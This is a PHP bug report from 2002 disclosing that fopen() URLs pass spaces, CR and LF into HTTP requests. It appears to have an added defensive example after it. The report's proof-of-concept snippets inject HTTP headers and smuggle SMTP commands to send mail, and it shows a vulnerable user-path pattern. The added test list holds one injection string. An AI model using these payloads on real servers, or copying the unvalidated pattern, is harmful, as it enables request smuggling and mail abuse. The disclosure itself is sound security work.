[2002-08-28 18:51 UTC] rasmus@php.net
[2002-08-28 18:59 UTC] ulfh at update dot uu dot se
[2002-08-29 01:31 UTC] derick@php.net
[2002-09-10 04:26 UTC] stas@php.net
[2002-09-10 04:37 UTC] sesser@php.net
As you know, you can use URLs in fopen(), file() etc. when allow_url_fopen is On. Unfortunately, PHP doesn't remove spaces, tabs, CR or LF characters from the URL before constructing an HTTP query. This means that we can add arbitrary HTTP headers to the URL, like this:

    <?php
    $fp = fopen("http://www.site1.st/ HTTP/1.0\n".
                "Host: www.site2.st\n".
                "User-Agent: Nozilla/0.0\n".
                "Referer: http://www.metaur.nu/\n".
                "Cookie: user=ulf\n\n", "r");
    fpassthru($fp);
    ?>

This program will display the contents of site2.st instead of site1.st, if they live on the same virtual host. You can also use it for communication with other types of servers than HTTP servers:

    <?php
    $fp = fopen("http://mail.site1.st:25/ HTTP/1.0\n".
                "HELO my.own.machine\n".
                "MAIL FROM: <user@my.own.machine>\n".
                "RCPT TO: <info@site1.st>\n".
                "DATA\n".
                "From: user@my.own.machine\n".
                "To: info@site1.st\n".
                "Subject: This is..\n\n".
                "This is a URL that sends an e-mail (?).\n".
                ".\n".
                "QUIT\n\n", "r");
    fpassthru($fp);
    ?>

Both the mail server and PHP will complain, but the mail still gets sent. This can even lead to a security hole in a program like this:

    <?php
    $fp = fopen("http://www.site3.st/$path", "r");
    fpassthru($fp);
    ?>

because it allows the user to break out of restrictions and access some other site than site3.st. I have verified this behaviour in PHP 4.1.2, 4.2.2 and a CVS checkout from a few days ago. You fix it by removing all spaces, tabs, CR characters and LF characters from the URLs.

// Ulf Harnhammar ulfh@update.uu.se
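The following is an added example, not part of the original report and not PHP's own code, showing where the reporter's suggested fix belongs in an application that interpolates user input into a URL (the third snippet above): validate the user-supplied path before it reaches fopen(), and refuse anything containing spaces, tabs, CR or LF. The helper names safe_remote_path, contains_url_whitespace and fetch_remote are hypothetical, the inputs are constructed, and the code assumes PHP 7.1 or later.

```php
<?php
// Added example (hypothetical helpers, not from the bug report or from PHP).
// Goal: never let whitespace or control characters from user input reach the
// URL that fopen()/file_get_contents() will turn into an HTTP request line.

// Allow-list check for a path that will be appended to a fixed base URL.
// Spaces, tabs, CR and LF (the characters the report names) are rejected,
// along with everything else outside a conservative set of path characters.
function safe_remote_path(string $path): ?string
{
    if ($path === '' || !preg_match('#\A[A-Za-z0-9._~/-]+\z#', $path)) {
        return null;
    }
    // The path is appended to a base, so refuse traversal segments too.
    foreach (explode('/', $path) as $segment) {
        if ($segment === '..') {
            return null;
        }
    }
    return $path;
}

// Final defence on the assembled URL: the reporter's fix expressed as a check.
// Any space, tab, CR or LF in a URL means a request line could be split.
function contains_url_whitespace(string $url): bool
{
    return preg_match('/[ \t\r\n]/', $url) === 1;
}

// Fetch helper that only performs the request once both checks pass.
// Returns null instead of sending a malformed request.
function fetch_remote(string $base, string $path): ?string
{
    $safe = safe_remote_path($path);
    if ($safe === null) {
        return null;
    }
    $url = rtrim($base, '/') . '/' . $safe;
    if (contains_url_whitespace($url)) {
        return null;
    }
    $data = @file_get_contents($url);
    return $data === false ? null : $data;
}

// Constructed inputs: a benign path, a header-injection attempt of the kind
// the report describes, and a traversal attempt. No network access is made.
$cases = [
    'index.html',
    "index.html HTTP/1.0\nHost: www.site2.st\n\n",
    '../private/config',
];
foreach ($cases as $case) {
    $verdict = safe_remote_path($case) === null ? 'rejected' : 'accepted';
    printf("%-50s => %s\n", json_encode($case), $verdict);
}
```

The first input is accepted and the other two are rejected. Validating the fragment on its own allow-list is the primary control; the whitespace check on the assembled URL is a second layer so that a later change to how the URL is built cannot silently reintroduce the problem.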